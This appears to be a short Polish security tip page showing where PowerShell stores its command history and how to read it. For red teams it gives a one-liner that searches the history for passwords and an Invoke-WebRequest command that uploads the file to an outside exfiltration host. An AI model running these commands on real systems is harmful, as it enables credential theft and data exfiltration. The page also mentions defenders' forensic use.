cat (Get-PSReadLineOption).HistorySavePath - wyświetl historię poleceń Powershella

więcej informacji poniżej

Dodatkowe informacje

Get-PSReadLineOption zwróci kilka ustawień dotyczących konsoli, w HistorySavePath zawarta jest ścieżka do historii poleceń - analogicznie do ~/.bash_history znanego unixowcom.

Zwyczajowo na Windowsach będzie to:

        PS C:\Users\drg> (Get-PSReadLineOption).HistorySavePath
        C:\Users\drg\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
        PS C:\Users\drg>

a na *nixach:

        PS /Users/drg> (Get-PSReadLineOption).HistorySavePath
        /Users/drg/.local/share/powershell/PSReadLine/ConsoleHost_history.txt
        PS /Users/drg>

Do czego się może przydać?

W przypadku RedTeamów myślę, że warto poszukać wrażliwych wyrazów takich jak passw:

        cat (Get-PSReadLineOption).HistorySavePath|sls passw

albo w ogóle całą historię szybko wyeksfiltrować (np. wykorzystując aptm.in/protip/001a i analizować offline:

        iwr -me po -i (Get-PSReadLineOption).HistorySavePath http://exfil.aptmc.pl:2048/

Z kolei BlueTeamy i ThreatHunterzy mogą rzucić okiem na tę historię podczas analizy skompromitowanych hostów.

Przydatne linki

aptm.in/protip/001a - wykorzystanie iwr (Invoke-WebRequest) do eksfiltracji
aptm.in/protip/001b - przykładowy TCP listener z wykorzytaniem socata

Subskrybuj

Jeśli chcesz otrzymywać nowe, mięsiste protipy na maila, a także zostać czasem powiadomiony o wartościowych wydarzeniach - dołącz do subskrybentów.